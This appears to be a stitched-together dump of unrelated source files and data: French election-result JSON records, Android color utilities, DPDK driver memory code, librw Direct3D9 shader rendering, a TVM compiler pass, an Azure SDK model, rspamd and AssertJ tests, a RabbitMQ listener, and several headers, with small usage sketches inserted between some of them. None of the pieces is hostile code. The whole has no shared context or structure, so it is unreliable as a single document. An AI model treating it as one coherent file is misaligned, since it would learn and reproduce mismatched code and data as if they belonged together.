{"nom":"Crupilly","circ":"3ème circonscription","dpt":"Aisne","inscrits":43,"abs":22,"votants":21,"blancs":1,"nuls":0,"exp":20,"res":[{"nuance":"SOC","nom":"<NAME>","voix":14},{"nuance":"FN","nom":"<NAME>","voix":6}]}
// app/src/main/java/com/malmstein/yahnac/views/ColorTweaker.java
package com.malmstein.yahnac.views;

import android.graphics.Color;

public class ColorTweaker {

    public static final float COMPONENT_MAX = 1f;

    private static final int HSV_BRIGHTNESS = 2;
    private static final float FACTOR_PROGRESSBAR_BRIGHTNESS = 1.4f;
    private static final float FACTOR_STATUSBAR_BRIGHTNESS = 0.9f;

    public int getProgressBarVariantOf(int originalColor) {
        float[] hsv = new float[3];
        int alpha = Color.alpha(originalColor);
        Color.colorToHSV(originalColor, hsv);
        hsv[HSV_BRIGHTNESS] = multiplyComponent(hsv[HSV_BRIGHTNESS], FACTOR_PROGRESSBAR_BRIGHTNESS);
        return Color.HSVToColor(alpha, hsv);
    }

    public int getStatusBarVariantOf(int originalColor) {
        float[] hsv = new float[3];
        int alpha = Color.alpha(originalColor);
        Color.colorToHSV(originalColor, hsv);
        hsv[HSV_BRIGHTNESS] = multiplyComponent(hsv[HSV_BRIGHTNESS], FACTOR_STATUSBAR_BRIGHTNESS);
        return Color.HSVToColor(alpha, hsv);
    }

    private float multiplyComponent(float component, float factor) {
        return Math.min(component * factor, COMPONENT_MAX);
    }
}
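A short caller-side sketch of how ColorTweaker might be used (the base color value and variable names are assumptions):

// Hypothetical caller code.
int storyColor = Color.parseColor("#FF5722");
ColorTweaker tweaker = new ColorTweaker();
int statusBarColor = tweaker.getStatusBarVariantOf(storyColor);     // slightly darker (factor 0.9)
int progressBarColor = tweaker.getProgressBarVariantOf(storyColor); // brighter, clamped at COMPONENT_MAX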
/* SPDX-License-Identifier: BSD-3-Clause * Copyright(c) 2019-2021 Intel Corporation */ #include <stdio.h> #include <inttypes.h> #include <rte_common.h> #include <rte_random.h> #include <rte_malloc.h> #include <rte_memzone.h> #include "iavf_type.h" #include "iavf_prototype.h" enum iavf_status iavf_allocate_dma_mem_d(__rte_unused struct iavf_hw *hw, struct iavf_dma_mem *mem, u64 size, u32 alignment) { const struct rte_memzone *mz = NULL; char z_name[RTE_MEMZONE_NAMESIZE]; if (!mem) return IAVF_ERR_PARAM; snprintf(z_name, sizeof(z_name), "iavf_dma_%"PRIu64, rte_rand()); mz = rte_memzone_reserve_bounded(z_name, size, SOCKET_ID_ANY, RTE_MEMZONE_IOVA_CONTIG, alignment, RTE_PGSIZE_2M); if (!mz) return IAVF_ERR_NO_MEMORY; mem->size = size; mem->va = mz->addr; mem->pa = mz->iova; mem->zone = (const void *)mz; return IAVF_SUCCESS; } enum iavf_status iavf_free_dma_mem_d(__rte_unused struct iavf_hw *hw, struct iavf_dma_mem *mem) { if (!mem) return IAVF_ERR_PARAM; rte_memzone_free((const struct rte_memzone *)mem->zone); mem->zone = NULL; mem->va = NULL; mem->pa = (u64)0; return IAVF_SUCCESS; } enum iavf_status iavf_allocate_virt_mem_d(__rte_unused struct iavf_hw *hw, struct iavf_virt_mem *mem, u32 size) { if (!mem) return IAVF_ERR_PARAM; mem->size = size; mem->va = rte_zmalloc("iavf", size, 0); if (mem->va) return IAVF_SUCCESS; else return IAVF_ERR_NO_MEMORY; } enum iavf_status iavf_free_virt_mem_d(__rte_unused struct iavf_hw *hw, struct iavf_virt_mem *mem) { if (!mem) return IAVF_ERR_PARAM; rte_free(mem->va); mem->va = NULL; return IAVF_SUCCESS; } RTE_LOG_REGISTER(iavf_common_logger, pmd.common.iavf, NOTICE);
<reponame>ccawley2011/librw<filename>src/d3d/d3d9matfx.cpp<gh_stars>100-1000 #include <stdio.h> #include <stdlib.h> #include <string.h> #include <assert.h> #define WITH_D3D #include "../rwbase.h" #include "../rwerror.h" #include "../rwplg.h" #include "../rwpipeline.h" #include "../rwobjects.h" #include "../rwanim.h" #include "../rwengine.h" #include "../rwrender.h" #include "../rwplugins.h" #include "rwd3d.h" #include "rwd3d9.h" namespace rw { namespace d3d9 { using namespace d3d; #ifndef RW_D3D9 void matfxRenderCB_Shader(Atomic *atomic, InstanceDataHeader *header) {} #else static void *matfx_env_amb_VS; static void *matfx_env_amb_dir_VS; static void *matfx_env_all_VS; static void *matfx_env_PS; static void *matfx_env_tex_PS; enum { VSLOC_texMat = VSLOC_afterLights, VSLOC_colorClamp = VSLOC_texMat + 4, VSLOC_envColor, PSLOC_shininess = 1, }; void matfxRender_Default(InstanceDataHeader *header, InstanceData *inst, int32 lightBits) { Material *m = inst->material; // Pick a shader if((lightBits & VSLIGHT_MASK) == 0) setVertexShader(default_amb_VS); else if((lightBits & VSLIGHT_MASK) == VSLIGHT_DIRECT) setVertexShader(default_amb_dir_VS); else setVertexShader(default_all_VS); SetRenderState(VERTEXALPHA, inst->vertexAlpha || m->color.alpha != 255); if(inst->material->texture){ d3d::setTexture(0, m->texture); setPixelShader(default_tex_PS); }else setPixelShader(default_PS); drawInst(header, inst); } static Frame *lastEnvFrame; static RawMatrix normal2texcoord = { { 0.5f, 0.0f, 0.0f }, 0.0f, { 0.0f, -0.5f, 0.0f }, 0.0f, { 0.0f, 0.0f, 1.0f }, 0.0f, { 0.5f, 0.5f, 0.0f }, 1.0f }; void uploadEnvMatrix(Frame *frame) { Matrix invMat; if(frame == nil) frame = engine->currentCamera->getFrame(); // cache the matrix across multiple meshes // can't do it, frame matrix may change // if(frame == lastEnvFrame) // return; // lastEnvFrame = frame; RawMatrix envMtx, invMtx; Matrix::invert(&invMat, frame->getLTM()); convMatrix(&invMtx, &invMat); invMtx.pos.set(0.0f, 0.0f, 0.0f); float uscale = fabs(normal2texcoord.right.x); normal2texcoord.right.x = MatFX::envMapFlipU ? -uscale : uscale; RawMatrix::mult(&envMtx, &invMtx, &normal2texcoord); d3ddevice->SetVertexShaderConstantF(VSLOC_texMat, (float*)&envMtx, 4); } void matfxRender_EnvMap(InstanceDataHeader *header, InstanceData *inst, int32 lightBits, MatFX::Env *env) { Material *m = inst->material; if(env->tex == nil || env->coefficient == 0.0f){ matfxRender_Default(header, inst, lightBits); return; } d3d::setTexture(1, env->tex); uploadEnvMatrix(env->frame); SetRenderState(SRCBLEND, BLENDONE); static float zero[4]; static float one[4] = { 1.0f, 1.0f, 1.0f, 1.0f }; struct { float shininess; float disableFBA; float unused[2]; } fxparams; fxparams.shininess = env->coefficient; fxparams.disableFBA = env->fbAlpha ? 0.0f : 1.0f; d3ddevice->SetPixelShaderConstantF(PSLOC_shininess, (float*)&fxparams, 1); // This clamps the vertex color below. 
With it we can achieve both PC and PS2 style matfx if(MatFX::envMapApplyLight) d3ddevice->SetVertexShaderConstantF(VSLOC_colorClamp, zero, 1); else d3ddevice->SetVertexShaderConstantF(VSLOC_colorClamp, one, 1); RGBAf envcol[4]; if(MatFX::envMapUseMatColor) convColor(envcol, &m->color); else convColor(envcol, &MatFX::envMapColor); d3ddevice->SetVertexShaderConstantF(VSLOC_envColor, (float*)&envcol, 1); // Pick a shader if((lightBits & VSLIGHT_MASK) == 0) setVertexShader(matfx_env_amb_VS); else if((lightBits & VSLIGHT_MASK) == VSLIGHT_DIRECT) setVertexShader(matfx_env_amb_dir_VS); else setVertexShader(matfx_env_all_VS); bool32 texAlpha = GETD3DRASTEREXT(env->tex->raster)->hasAlpha; if(inst->material->texture){ d3d::setTexture(0, m->texture); setPixelShader(matfx_env_tex_PS); }else setPixelShader(matfx_env_PS); SetRenderState(VERTEXALPHA, texAlpha || inst->vertexAlpha || m->color.alpha != 255); drawInst(header, inst); SetRenderState(SRCBLEND, BLENDSRCALPHA); } void matfxRenderCB_Shader(Atomic *atomic, InstanceDataHeader *header) { int vsBits; uint32 flags = atomic->geometry->flags; setStreamSource(0, (IDirect3DVertexBuffer9*)header->vertexStream[0].vertexBuffer, 0, header->vertexStream[0].stride); setIndices((IDirect3DIndexBuffer9*)header->indexBuffer); setVertexDeclaration((IDirect3DVertexDeclaration9*)header->vertexDeclaration); lastEnvFrame = nil; vsBits = lightingCB_Shader(atomic); uploadMatrices(atomic->getFrame()->getLTM()); bool normals = !!(atomic->geometry->flags & Geometry::NORMALS); InstanceData *inst = header->inst; for(uint32 i = 0; i < header->numMeshes; i++){ Material *m = inst->material; setMaterial(flags, m->color, m->surfaceProps); MatFX *matfx = MatFX::get(m); if(matfx == nil) matfxRender_Default(header, inst, vsBits); else switch(matfx->type){ case MatFX::ENVMAP: if(normals) matfxRender_EnvMap(header, inst, vsBits, &matfx->fx[0].env); else matfxRender_Default(header, inst, vsBits); break; case MatFX::NOTHING: case MatFX::BUMPMAP: case MatFX::BUMPENVMAP: case MatFX::DUAL: case MatFX::UVTRANSFORM: case MatFX::DUALUVTRANSFORM: // not supported yet matfxRender_Default(header, inst, vsBits); break; } inst++; } d3d::setTexture(1, nil); } #define VS_NAME g_vs20_main #define PS_NAME g_ps20_main void createMatFXShaders(void) { { static #include "shaders/matfx_env_amb_VS.h" matfx_env_amb_VS = createVertexShader((void*)VS_NAME); assert(matfx_env_amb_VS); } { static #include "shaders/matfx_env_amb_dir_VS.h" matfx_env_amb_dir_VS = createVertexShader((void*)VS_NAME); assert(matfx_env_amb_dir_VS); } { static #include "shaders/matfx_env_all_VS.h" matfx_env_all_VS = createVertexShader((void*)VS_NAME); assert(matfx_env_all_VS); } { static #include "shaders/matfx_env_PS.h" matfx_env_PS = createPixelShader((void*)PS_NAME); assert(matfx_env_PS); } { static #include "shaders/matfx_env_tex_PS.h" matfx_env_tex_PS = createPixelShader((void*)PS_NAME); assert(matfx_env_tex_PS); } } void destroyMatFXShaders(void) { destroyVertexShader(matfx_env_amb_VS); matfx_env_amb_VS = nil; destroyVertexShader(matfx_env_amb_dir_VS); matfx_env_amb_dir_VS = nil; destroyVertexShader(matfx_env_all_VS); matfx_env_all_VS = nil; destroyPixelShader(matfx_env_PS); matfx_env_PS = nil; destroyPixelShader(matfx_env_tex_PS); matfx_env_tex_PS = nil; } #endif static void* matfxOpen(void *o, int32, int32) { #ifdef RW_D3D9 createMatFXShaders(); #endif matFXGlobals.pipelines[PLATFORM_D3D9] = makeMatFXPipeline(); return o; } static void* matfxClose(void *o, int32, int32) { #ifdef RW_D3D9 destroyMatFXShaders(); #endif 
((ObjPipeline*)matFXGlobals.pipelines[PLATFORM_D3D9])->destroy(); matFXGlobals.pipelines[PLATFORM_D3D9] = nil; return o; } void initMatFX(void) { Driver::registerPlugin(PLATFORM_D3D9, 0, ID_MATFX, matfxOpen, matfxClose); } ObjPipeline* makeMatFXPipeline(void) { ObjPipeline *pipe = ObjPipeline::create(); pipe->instanceCB = defaultInstanceCB; pipe->uninstanceCB = defaultUninstanceCB; pipe->renderCB = matfxRenderCB_Shader; pipe->pluginID = ID_MATFX; pipe->pluginData = 0; return pipe; } } }
library.json
{
  "name": "BLEPeripheral",
  "version": "0.4.0",
  "keywords": "BLE, bluetooth, peripheral",
  "description": "Arduino library for creating custom BLE peripherals. Supports nRF8001 and nRF51822 based boards/shields.",
  "repository": {
    "type": "git",
    "url": "https://github.com/sandeepmistry/arduino-BLEPeripheral.git"
  },
  "frameworks": "arduino",
  "platforms": "nordicnrf51, atmelavr, atmelsam, teensy"
}
// Marklight/Marklight.h
//
//  Marklight
//
//  Created by <NAME> on 01/01/16.
//  Copyright © 2016 MacTeo. LICENSE for details.
//

#import <UIKit/UIKit.h>

//! Project version number for Marklight.
FOUNDATION_EXPORT double MarklightVersionNumber;

//! Project version string for Marklight.
FOUNDATION_EXPORT const unsigned char MarklightVersionString[];

// In this header, you should import all the public headers of your framework using statements like #import <Marklight/PublicHeader.h>
// r2d2rigo/Win2D
// Copyright (c) Microsoft Corporation. All rights reserved.
//
// Licensed under the MIT License. See LICENSE.txt in the project root for license information.

#pragma once

template<typename T>
class Nullable : public Microsoft::WRL::RuntimeClass<ABI::Windows::Foundation::IReference<T>>
               , private LifespanTracker<Nullable<T>>
{
    InspectableClass(IReference<T>::z_get_rc_name_impl(), BaseTrust);

public:
    // T_abi and T are normally the same, but when T=bool, T_abi=boolean.
    typedef typename ABI::Windows::Foundation::Internal::GetAbiType<typename RuntimeClass::IReference::T_complex>::type T_abi;

private:
    T_abi m_value;

    static_assert(std::is_pod<T>::value, "T must be plain-old-data");

public:
    Nullable(T_abi const& value)
        : m_value(value)
    {}

    IFACEMETHODIMP get_Value(T_abi* value)
    {
        if (!value)
            return E_POINTER;

        *value = m_value;
        return S_OK;
    }
};
#ifndef _Tracker_TrajectorySmoother_H_
#define _Tracker_TrajectorySmoother_H_

#include "TrackingTools/PatternTools/interface/Trajectory.h"

class TkCloner;

/** Interface class for trajectory smoothers,
 *  i.e. objects improving a Trajectory built elsewhere.
 */
class TrajectorySmoother {
public:
  typedef std::vector<Trajectory> TrajectoryContainer;
  typedef TrajectoryContainer::iterator TrajectoryIterator;

  virtual ~TrajectorySmoother() {}

  virtual TrajectoryContainer trajectories(const Trajectory& traj) const {
    Trajectory&& nt = trajectory(traj);
    if (nt.isValid())
      return TrajectoryContainer(1, nt);
    return TrajectoryContainer();
  }

  virtual Trajectory trajectory(const Trajectory&) const = 0;

  virtual TrajectorySmoother* clone() const = 0;

  // FIXME a prototype: final implementation may differ
  virtual void setHitCloner(TkCloner const*) = 0;
};

#endif
<reponame>shreejitverma/tvm /* * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ /*! * \file extract_constant.cc * \brief Pushes out constants within partitioned functions all the way upto main() */ #include <tvm/relay/attrs/nn.h> #include <tvm/relay/expr_functor.h> #include <tvm/relay/transform.h> #include <tvm/runtime/ndarray.h> #include "../../../qnn/utils.h" #include "../../../transforms/pattern_utils.h" namespace tvm { namespace relay { namespace contrib { namespace cmsisnn { /*! * \brief This Mutator finds all functions with constants. Constants are replaced with function * parameter variables. Constants are pushed all the way upto main(). */ class ExtractConstantsMutator : public MixedModeMutator { public: explicit ExtractConstantsMutator(const IRModule& mod) : mod_(mod) {} private: String gen_var_name() { return "tvm_var_extract_const_" + std::to_string(var_count_++); } using MixedModeMutator::VisitExpr_; Expr VisitExpr_(const FunctionNode* function) final { Function func = GetRef<Function>(function); function_to_constants_.Set(func, Array<Constant>{}); functions_.push_back(func); auto new_body = VisitExpr(func->body); functions_.pop_back(); if (function_to_constants_[func].size()) { func = Function(FreeVars(new_body), new_body, func->ret_type, FreeTypeVars(new_body, mod_), func->attrs); } return std::move(func); } Expr Rewrite_(const CallNode* call, const Expr& post) final { Expr final_call = post; auto* post_call = post.as<CallNode>(); // Replace Constant arguments with Vars for ML Operators // Perform this for non-main Call Nodes only if (!functions_.empty() && call->op.as<OpNode>()) { Array<Expr> new_args; for (auto& arg : post_call->args) { auto* const_arg = arg.as<ConstantNode>(); if (const_arg && !const_arg->is_scalar()) { Var var_arg = Var(gen_var_name(), const_arg->tensor_type()); new_args.push_back(var_arg); const Function& last_func = functions_.back(); Array<Constant> fconstants(function_to_constants_[last_func]); fconstants.push_back(GetRef<Constant>(const_arg)); function_to_constants_.Set(last_func, fconstants); } else { new_args.push_back(arg); } } final_call = Call(call->op, new_args, call->attrs, {}); } // Since the constants are kicked out of partitioned functions // a new call to global function is needed if (auto* glob_var_node = post_call->op.as<GlobalVarNode>()) { auto glob_var = GetRef<GlobalVar>(glob_var_node); auto glob_func = Downcast<Function>(mod_->Lookup(glob_var)); auto new_glob_func = VisitExpr(glob_func); if (!new_glob_func.same_as(glob_func)) { mod_->Update(glob_var, Downcast<Function>(new_glob_func)); Array<Expr> new_args = post_call->args; ICHECK(function_to_constants_.find(glob_func) != function_to_constants_.end()); for (auto constant : function_to_constants_.at(glob_func)) { new_args.push_back(constant); } final_call = 
Call(glob_var, new_args); } } // Since the constants are kicked out of the local partitioned functions // a new call to local function is needed // Also, pass on the constants to the callee of this function to support nested functions if (auto* func_node = call->op.as<FunctionNode>()) { Function func = GetRef<Function>(func_node); auto new_func = VisitExpr(func); if (!new_func.same_as(func)) { Array<Expr> new_args = post_call->args; ICHECK(function_to_constants_.find(func) != function_to_constants_.end()); const Function& last_func = functions_.back(); Array<Constant> fconstants(function_to_constants_[last_func]); for (auto constant : function_to_constants_.at(func)) { fconstants.push_back(constant); Var var_arg = Var(gen_var_name(), constant->tensor_type()); new_args.push_back(var_arg); } function_to_constants_.Set(last_func, fconstants); final_call = Call(new_func, new_args); } } return final_call; } private: /* \brief Updated module where all calls have replaced constants with new variables */ IRModule mod_; /* \brief Maintains mapping of original function to the replaced constants */ Map<Function, Array<Constant>> function_to_constants_; /* \brief Stack of functions to determine scope while filling up function_to_constants_ */ Array<Function> functions_; /* \brief Keeps track of variables being created */ int var_count_ = 0; }; /*! * \brief Kicks out all constants out of the partitioned function into main() */ IRModule ExtractConstants(const IRModule& mod) { String func_name; Function func; auto extract_constants = ExtractConstantsMutator(mod); Function main_func = Downcast<Function>(mod->Lookup("main")); auto new_main_body = extract_constants.VisitExpr(main_func->body); if (!new_main_body.same_as(main_func->body)) { auto main_var = mod->GetGlobalVar("main"); auto new_main_func = Function(main_func->params, new_main_body, main_func->ret_type, main_func->type_params, main_func->attrs); mod->Update(main_var, new_main_func); } return mod; } transform::Pass ExtractConstantsFromPartitionedFunction() { runtime::TypedPackedFunc<IRModule(IRModule, transform::PassContext)> pass_func = [=](IRModule m, transform::PassContext pc) { return ExtractConstants(m); }; return tvm::transform::CreateModulePass(pass_func, 0, "ExtractConstantsFromPartitionedFunction", {}); } TVM_REGISTER_GLOBAL("relay.ext.cmsisnn.transform.ExtractConstantsFromPartitionedFunction") .set_body_typed(ExtractConstantsFromPartitionedFunction); } // namespace cmsisnn } // namespace contrib } // namespace relay } // namespace tvm
// Copyright (c) Microsoft Corporation. All rights reserved.
// Licensed under the MIT License.
// Code generated by Microsoft (R) AutoRest Code Generator.

package com.azure.resourcemanager.security.models;

import com.azure.core.annotation.Immutable;
import com.azure.core.util.logging.ClientLogger;
import com.fasterxml.jackson.annotation.JsonIgnore;
import com.fasterxml.jackson.annotation.JsonProperty;

/** Statistical information about the number of alerts per alert type during last set number of days. */
@Immutable
public final class IoTSecurityDeviceAlert {
    @JsonIgnore private final ClientLogger logger = new ClientLogger(IoTSecurityDeviceAlert.class);

    /*
     * Display name of the alert
     */
    @JsonProperty(value = "alertDisplayName", access = JsonProperty.Access.WRITE_ONLY)
    private String alertDisplayName;

    /*
     * Assessed Alert severity.
     */
    @JsonProperty(value = "reportedSeverity", access = JsonProperty.Access.WRITE_ONLY)
    private ReportedSeverity reportedSeverity;

    /*
     * Number of alerts raised for this alert type.
     */
    @JsonProperty(value = "alertsCount", access = JsonProperty.Access.WRITE_ONLY)
    private Long alertsCount;

    /**
     * Get the alertDisplayName property: Display name of the alert.
     *
     * @return the alertDisplayName value.
     */
    public String alertDisplayName() {
        return this.alertDisplayName;
    }

    /**
     * Get the reportedSeverity property: Assessed Alert severity.
     *
     * @return the reportedSeverity value.
     */
    public ReportedSeverity reportedSeverity() {
        return this.reportedSeverity;
    }

    /**
     * Get the alertsCount property: Number of alerts raised for this alert type.
     *
     * @return the alertsCount value.
     */
    public Long alertsCount() {
        return this.alertsCount;
    }

    /**
     * Validates the instance.
     *
     * @throws IllegalArgumentException thrown if the instance is not valid.
     */
    public void validate() {
    }
}
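A brief read-side sketch; how such an alert record is obtained is an assumption (the placeholder below is not a real SDK call), while the getters are the ones defined above:

// Hypothetical consumer of the immutable model.
IoTSecurityDeviceAlert alert = fetchAlertSomehow(); // placeholder for a Security Center query result
System.out.printf("%s (severity %s): %d occurrence(s)%n",
        alert.alertDisplayName(), alert.reportedSeverity(), alert.alertsCount());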
/*- * Copyright 2021 <NAME> * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ #define DOCTEST_CONFIG_IMPLEMENTATION_IN_DLL #include "doctest/doctest.h" #include "mime_string.hxx" #include "unicode/uchar.h" TEST_SUITE("mime_string") { using namespace rspamd::mime; TEST_CASE("mime_string unfiltered ctors") { SUBCASE("empty") { mime_string st; CHECK(st.size() == 0); CHECK(st == ""); } SUBCASE("unfiltered valid") { mime_string st{std::string_view("abcd")}; CHECK(st == "abcd"); } SUBCASE("unfiltered zero character") { mime_string st{"abc\0d", 5}; CHECK(st.has_zeroes()); CHECK(st == "abcd"); } SUBCASE("unfiltered invalid character - middle") { mime_string st{std::string("abc\234d")}; CHECK(st.has_invalid()); CHECK(st == "abc\uFFFDd"); } SUBCASE("unfiltered invalid character - end") { mime_string st{std::string("abc\234")}; CHECK(st.has_invalid()); CHECK(st == "abc\uFFFD"); } SUBCASE("unfiltered invalid character - start") { mime_string st{std::string("\234abc")}; CHECK(st.has_invalid()); CHECK(st == "\uFFFDabc"); } } TEST_CASE("mime_string filtered ctors") { auto print_filter = [](UChar32 inp) -> UChar32 { if (!u_isprint(inp)) { return 0; } return inp; }; auto tolower_filter = [](UChar32 inp) -> UChar32 { return u_tolower(inp); }; SUBCASE("empty") { mime_string st{std::string_view(""), tolower_filter}; CHECK(st.size() == 0); CHECK(st == ""); } SUBCASE("filtered valid") { mime_string st{std::string("AbCdУ"), tolower_filter}; CHECK(st == "abcdу"); } SUBCASE("filtered invalid + filtered") { mime_string st{std::string("abcd\234\1"), print_filter}; CHECK(st == "abcd\uFFFD"); } } TEST_CASE("mime_string assign") { SUBCASE("assign from valid") { mime_string st; CHECK(st.assign_if_valid(std::string("test"))); CHECK(st == "test"); } SUBCASE("assign from invalid") { mime_string st; CHECK(!st.assign_if_valid(std::string("test\234t"))); CHECK(st == ""); } } TEST_CASE("mime_string iterators") { SUBCASE("unfiltered iterator ascii") { auto in = std::string("abcd"); mime_string st{in}; CHECK(st == "abcd"); int i = 0; for (auto &&c : st) { CHECK(c == in[i++]); } } SUBCASE("unfiltered iterator utf8") { auto in = std::string("тест"); UChar32 ucs[4] = {1090, 1077, 1089, 1090}; mime_string st{in}; CHECK(st == "тест"); int i = 0; for (auto &&c : st) { CHECK(c == ucs[i++]); } CHECK(i == sizeof(ucs) / sizeof(ucs[0])); } SUBCASE("unfiltered raw iterator ascii") { auto in = std::string("abcd"); mime_string st{in}; CHECK(st == "abcd"); int i = 0; for (auto it = st.raw_begin(); it != st.raw_end(); ++it) { CHECK(*it == in[i++]); } } SUBCASE("unfiltered raw iterator utf8") { auto in = std::string("тест"); mime_string st{in}; CHECK(st == "тест"); int i = 0; for (auto it = st.raw_begin(); it != st.raw_end(); ++it) { CHECK(*it == in[i++]); } CHECK(i == in.size()); } } }
// leyou-comments/leyou-comments-service/src/main/java/com/leyou/comments/listener/CommentsListener.java
package com.leyou.comments.listener;

import com.leyou.comments.dao.CommentDao;
import com.leyou.comments.pojo.Review;
import com.leyou.comments.service.CommentService;
import com.leyou.order.vo.CommentsParameter;
import com.leyou.utils.IdWorker;
import com.leyou.utils.JsonUtils;
import org.springframework.amqp.core.ExchangeTypes;
import org.springframework.amqp.rabbit.annotation.Exchange;
import org.springframework.amqp.rabbit.annotation.Queue;
import org.springframework.amqp.rabbit.annotation.QueueBinding;
import org.springframework.amqp.rabbit.annotation.RabbitListener;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.data.mongodb.core.MongoTemplate;
import org.springframework.data.mongodb.core.query.Criteria;
import org.springframework.data.mongodb.core.query.Query;
import org.springframework.data.mongodb.core.query.Update;
import org.springframework.stereotype.Component;

import java.util.Date;

/**
 * @Author: 98050
 * @Time: 2018-12-12 11:54
 * @Feature: Consumes comment messages from the queue and publishes the review.
 */
@Component
public class CommentsListener {

    @Autowired
    private IdWorker idWorker;

    @Autowired
    private MongoTemplate mongoTemplate;

    @Autowired
    private CommentDao commentDao;

    /**
     * Reads a message from the queue and publishes the comment.
     * @param string the JSON payload
     */
    @RabbitListener(bindings = @QueueBinding(
            value = @Queue(value = "leyou.comments.queue", durable = "true"), // durable queue
            exchange = @Exchange(
                    value = "leyou.comments.exchange",
                    ignoreDeclarationExceptions = "true",
                    type = ExchangeTypes.TOPIC
            ),
            key = {"user.comments"}
    ))
    public void listenCommentsMessage(String string) {
        CommentsParameter commentsParameter = JsonUtils.parse(string, CommentsParameter.class);
        if (commentsParameter == null) {
            return;
        }
        Review review = commentsParameter.getReview();
        review.set_id(idWorker.nextId() + "");
        review.setPublishtime(new Date());
        review.setComment(0);
        review.setThumbup(0);
        review.setVisits(0);
        if (review.getParentid() != null && !"".equals(review.getParentid())) {
            // If a parent id exists: increment the parent's comment count,
            // mark the parent as having replies, and increment its visit count.
            Query query = new Query();
            query.addCriteria(Criteria.where("_id").is(review.getParentid()));
            Update update = new Update();
            update.inc("comment", 1);
            update.set("isparent", true);
            update.inc("visits", 1);
            this.mongoTemplate.updateFirst(query, update, "review");
        }
        commentDao.save(review);
    }
}
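For context, a producer-side sketch of the message this listener consumes; the sending service is not part of this excerpt, so the RabbitTemplate wiring, the setter, and the serialize helper are assumptions:

// Hypothetical sender, e.g. in the service where a user submits a comment.
CommentsParameter parameter = new CommentsParameter();
parameter.setReview(review); // assumed setter matching the getReview() used by the listener
amqpTemplate.convertAndSend("leyou.comments.exchange", "user.comments",
        JsonUtils.serialize(parameter)); // assumed JSON helper; the listener parses with JsonUtils.parse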
{"nom":"Le Trait","circ":"5ème circonscription","dpt":"Seine-Maritime","inscrits":3964,"abs":2335,"votants":1629,"blancs":39,"nuls":6,"exp":1584,"res":[{"nuance":"SOC","nom":"<NAME>","voix":772},{"nuance":"FN","nom":"<NAME>","voix":355},{"nuance":"LR","nom":"<NAME>","voix":211},{"nuance":"FI","nom":"Mme <NAME>","voix":154},{"nuance":"ECO","nom":"M. <NAME>","voix":44},{"nuance":"EXG","nom":"<NAME>","voix":27},{"nuance":"DIV","nom":"<NAME>","voix":19},{"nuance":"DVG","nom":"M. <NAME>","voix":2}]}
<reponame>ascopes/assertj-core<filename>src/test/java/org/example/test/Throwables_getFirstStackTraceElementFromTest_Test.java<gh_stars>1000+ /* * Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on * an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the * specific language governing permissions and limitations under the License. * * Copyright 2012-2022 the original author or authors. */ package org.example.test; import static org.assertj.core.api.BDDAssertions.then; import static org.assertj.core.util.Arrays.array; import static org.assertj.core.util.Throwables.getFirstStackTraceElementFromTest; import static org.junit.jupiter.params.provider.Arguments.arguments; import java.util.stream.Stream; import org.junit.jupiter.api.Test; import org.junit.jupiter.params.ParameterizedTest; import org.junit.jupiter.params.provider.Arguments; import org.junit.jupiter.params.provider.MethodSource; class Throwables_getFirstStackTraceElementFromTest_Test { @Test void should_return_first_stack_trace_element_from_test() { // GIVEN StackTraceElement[] stackTraceElements = new Throwable().getStackTrace(); // WHEN StackTraceElement firstStackTraceElementFromTest = getFirstStackTraceElementFromTest(stackTraceElements); // THEN then(firstStackTraceElementFromTest).hasToString("org.example.test.Throwables_getFirstStackTraceElementFromTest_Test.should_return_first_stack_trace_element_from_test(Throwables_getFirstStackTraceElementFromTest_Test.java:32)"); } @ParameterizedTest @MethodSource void should_ignore_test_frameworks_ides_build_tool_and_jdk_stack_traces(String[] fullQualifiedClassNames, String expectedStackTraceElement) { // GIVEN StackTraceElement[] stackTraceElements = buildStackTraceFrom(fullQualifiedClassNames); // WHEN StackTraceElement firstStackTraceElementFromTest = getFirstStackTraceElementFromTest(stackTraceElements); // THEN then(firstStackTraceElementFromTest).hasToString(expectedStackTraceElement); } private StackTraceElement[] buildStackTraceFrom(String[] fullQualifiedClassNames) { StackTraceElement[] stackTraceElements = new StackTraceElement[fullQualifiedClassNames.length]; for (int i = 0; i < fullQualifiedClassNames.length; i++) { stackTraceElements[i] = new StackTraceElement(fullQualifiedClassNames[i], "foo", "Foo.java", i + 1); } return stackTraceElements; } private static Stream<Arguments> should_ignore_test_frameworks_ides_build_tool_and_jdk_stack_traces() { return Stream.of(arguments(array("com.foo.Foo", "sun.reflect", "org.assertj.core.api"), "com.foo.Foo.foo(Foo.java:1)"), arguments(array("sun.reflect", "com.foo.Foo", "org.assertj.core.api"), "com.foo.Foo.foo(Foo.java:2)"), arguments(array("sun.reflect", "org.assertj.core.api", "com.foo.Foo"), "com.foo.Foo.foo(Foo.java:3)"), arguments(array("jdk.internal.reflect", "java.", "javax.", "org.junit.", "org.eclipse.jdt.internal.junit.", "org.eclipse.jdt.internal.junit4.", "org.eclipse.jdt.internal.junit5.", "com.intellij.junit5.", "com.intellij.rt.execution.junit.", "com.intellij.rt.junit.", "org.apache.maven.surefire", "org.pitest.", "org.assertj", "com.foo.Foo"), "com.foo.Foo.foo(Foo.java:14)")); } }